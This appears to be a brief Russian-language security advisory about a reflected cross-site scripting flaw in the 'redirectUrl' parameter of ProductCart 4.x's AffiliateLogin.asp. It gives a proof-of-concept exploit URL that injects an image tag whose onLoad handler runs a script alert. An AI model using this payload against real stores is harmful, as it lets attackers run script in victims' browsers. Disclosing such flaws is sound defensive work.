Программа: ProductCart 4.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "redirectUrl" сценарием AffiliateLogin.asp. Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.

Эксплоит:

http://www.examplesite.com/store/pc/AffiliateLogin.asp?redirectUrl=%22%3E%3Cimg%20
src=%22http://www.google.com/images/logos/ps_logo2.png%22%20style=%22display:
none%22%20onLoad%20=%22alert%28%27XXS%27%29%22



Оставить мнение